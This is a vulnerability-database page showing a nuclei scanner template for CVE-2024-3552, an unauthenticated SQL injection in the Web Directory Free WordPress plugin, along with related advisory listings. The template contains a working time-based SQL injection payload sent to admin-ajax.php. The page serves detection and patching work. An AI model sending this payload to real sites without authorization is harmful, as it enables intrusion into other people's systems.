Lucene search
+L

Web Directory Free < 1.7.0 - SQL Injection

🗓️ 06 Sep 2026 02:04:30Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 59 Views

Web Directory Free < 1.7.0 - SQL Injection. Unsanitised parameter in SQL statement via AJAX action, leading to SQL injection with UNION, Time-Based & Error-Based techniques. Fixed in 1.7.0

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for SQL Injection in Salephpscripts Web_Directory_Free
27 May 202415:36
githubexploit
githubexploit
GithubExploit
Exploit for SQL Injection in Salephpscripts Web_Directory_Free
2 Mar 202620:47
githubexploit
circl
Circl
CVE-2024-3552
27 May 202415:40
circl
cnnvd
CNNVD
WordPress plugin Web Directory Free security vulnerability
13 Jun 202400:00
cnnvd
cve
CVE
CVE-2024-3552
13 Jun 202406:00
cve
cvelist
Cvelist
CVE-2024-3552 Web Directory Free < 1.7.0 - Unauthenticated SQL Injection
13 Jun 202406:00
cvelist
kitploit
Kitploit
challenge-cve-2024-3552
6 Sep 202616:19
kitploit
kitploit
Kitploit
cve-2024-3552
5 Sep 202612:34
kitploit
nvd
NVD
CVE-2024-3552
13 Jun 202406:15
nvd
osv
OSV
CVE-2024-3552
13 Jun 202406:15
osv
Rows per page
id: CVE-2024-3552

info:
  name: Web Directory Free < 1.7.0 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.
  impact: |
    Unauthenticated attackers can execute time-based SQL injection attacks via the locations_ids parameter.
  remediation: |
    Update Web Directory Free to version 1.7.0 or later.
  reference:
    - https://vulners.com/wpvulndb/CVE-2024-3552
    - https://wpscan.com/vulnerability/34b03ee4-de81-4fec-9f3d-e1bd5b94d136/
  classification:
    epss-score: 0.6706
    epss-percentile: 0.99273
    cpe: cpe:2.3:a:salephpscripts:web_directory_free:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: salephpscripts
    product: web_directory_free
    publicwww-query: "/wp-content/plugins/web-directory-free"
  tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wpscan,wp,web-directory-free,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/web-directory-free"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=w2dc_get_map_marker_info&locations_ids[]=(select+if(1=1,sleep(6),0)+from+(select+1)x)

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - regex('^\[\]$', body)
        condition: and
# digest: 490a004630440220070731a37a3b86c9cb0f84d3d88055c7f27af99e4a721c47007f9813ff36d2e002203a82499b4c1c81ce4cf28489477022176e08aafec988702c9b28afba30a486f9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.6706
SSVC
59